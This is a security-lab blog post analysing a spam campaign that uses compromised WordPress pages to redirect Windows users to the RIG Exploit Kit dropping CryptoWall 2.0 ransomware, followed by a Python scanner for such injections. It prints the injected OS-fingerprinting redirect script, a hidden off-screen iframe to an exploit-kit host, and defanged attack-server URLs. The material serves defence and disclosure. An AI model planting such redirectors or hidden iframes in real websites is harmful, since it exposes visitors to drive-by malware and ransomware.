RIG Exploit Kit Dropping CryptoWall 2.0

2014-10-17 17:25

ThreatTrack Security Labs today observed spammers exploiting vulnerable WordPress links to redirect users to servers hosting the RIG Exploit Kit, which takes advantage of any number of vulnerabilities in unpatched Silverlight, Flash, Java and other applications to drop CryptoWall 2.0.

CryptoWall 2.0, of course, is the nasty updated version of CryptoWall, which has built up steam since the disruption of CryptoLocker. Once infected with CryptoWall 2.0, users’ files are encrypted and held for ransom.

The spammers behind this latest campaign seem to be the same crew behind a recent wave of eFax spam reported over at Dynamoo’s Blog. But dropping CryptoWall 2.0 seems to be a new twist.

The campaign Dynamoo revealed is being hosted side-by-side on the same server as the RIG Exploit Kit: hxxp://206.253.165.76:8080

The exploit redirector is hxxp://206.253.165.76:8080/ord/rot.php

And the spam Dynamoo reported is hxxp://206.253.165.76:8080/ord/ef.html

Users are receiving malicious spam purporting to be from eFax with compromised WordPress links that redirect to RIG Exploit Kit serving CryptoWall 2.0.

Compromised WordPress links contain the following code:

<script>
// OS fingerprint taken from the browser's user-agent string
var OSName = "Unknown OS";
if (navigator.appVersion.indexOf("Win") != -1) OSName = "Windows";
if (navigator.appVersion.indexOf("Mac") != -1) OSName = "MacOS";
if (navigator.appVersion.indexOf("X11") != -1) OSName = "UNIX";
if (navigator.appVersion.indexOf("Linux") != -1) OSName = "Linux";
var1 = 112; var2 = var1;

// Windows visitors are sent to the RIG redirector; everyone else to a harmless Google search
if (OSName == "Windows") { location.replace("hxxp://206.253.165.76:8080/ord/rot.php"); } else { location.replace("http://google.com/search?q=efax"); }
</script>

The following is a list of compromised WordPress links already identified to contain the redirect:


The link hxxp://206.253.165.76:8080/ord/rot.php loads an iframe with a rotating malicious link that looks like this:

<iframe src="hxxp://cname.doyleware.com/?PHPSSESID=njrMNruDMh7HApzBKv7cTKZNKU7YHVnYmMzMhe6JVg|M2NlNGY0MWE2NjAwZDQxMWRmNGQyZTZhZjJjYmQ3MDU" width="468" height="60" style="position:absolute;left:-10000px;"></iframe>

This malicious link loads a RIG Exploit Kit landing page to exploit any of its targeted vulnerabilities to drop CryptoWall 2.0.
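Both injected artifacts described above, the OS-fingerprinting redirect script on the compromised WordPress pages and the off-screen iframe served by rot.php, can be flagged by static inspection of a site's HTML. The following Python scanner is an added example, not code from the ThreatTrack post; its sample inputs are constructed, and the redirect target address is an RFC 5737 placeholder rather than the server named in the post.

```python
import re
from urllib.parse import urlparse

# Constructed sample modelled on the injected redirector quoted in the post.
# The target host is a TEST-NET placeholder, not the address from the post.
INJECTED_REDIRECTOR = """<script>
var OSName="Unknown OS";
if (navigator.appVersion.indexOf("Win")!=-1) OSName="Windows";
if(OSName=="Windows") {location.replace("hxxp://203.0.113.10:8080/ord/rot.php");}else{location.replace("http://google.com/search?q=efax");}
</script>"""

# Constructed sample: a 468x60 iframe pushed 10000px off-screen, the same
# hiding technique used by the rotating exploit-kit frame.
HIDDEN_IFRAME = ('<iframe src="hxxp://cname.example.net/?PHPSSESID=abc" width="468" '
                 'height="60" style="position:absolute;left:-10000px;"></iframe>')

# Constructed benign page: reads the OS name but never redirects anywhere.
BENIGN = '<script>var OSName="Unknown OS"; console.log(OSName);</script>'

OS_FINGERPRINT = re.compile(r'navigator\.appVersion\.indexOf\(\s*"(Win|Mac|X11|Linux)"', re.I)
REDIRECT = re.compile(r'location\.replace\(\s*"((?:hxxp|http)s?://[^"]+)"', re.I)
OFFSCREEN_IFRAME = re.compile(r'<iframe[^>]*style="[^"]*left:\s*-\d{4,}px', re.I)


def off_site_redirects(html, site_host):
    """Return hostnames of location.replace() targets that are not the site itself.

    Defanged hxxp:// URLs are normalised so urlparse can extract the host."""
    hosts = []
    for url in REDIRECT.findall(html):
        host = urlparse(url.replace("hxxp", "http", 1)).hostname
        if host and host != site_host:
            hosts.append(host)
    return hosts


def scan_html(html, site_host):
    """Return the names of redirector indicators present in one HTML document."""
    findings = []
    # An OS check by itself is common; combined with an off-site redirect it
    # matches the Windows-only forwarding seen on the compromised pages.
    if OS_FINGERPRINT.search(html) and off_site_redirects(html, site_host):
        findings.append("os-fingerprint-redirect")
    if OFFSCREEN_IFRAME.search(html):
        findings.append("offscreen-iframe")
    return findings
```

Run over a web root's .html files with the site's own hostname as `site_host`; a hit on either indicator is a page worth pulling for review.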

The MD5 of the sample analyzed is 8cc0ccec8483dcb9cfeb88dbe0184402

Defend against the RIG Exploit Kit by keeping your PC patched: the kit relies on out-of-date, vulnerable software such as unpatched Silverlight, Flash and Java, so current versions minimize your exposure.

Credit: Matthew Mesa, Malware Researcher, ThreatTrack Security Labs

The post RIG Exploit Kit Dropping CryptoWall 2.0 appeared first on ThreatTrack Security Labs Blog.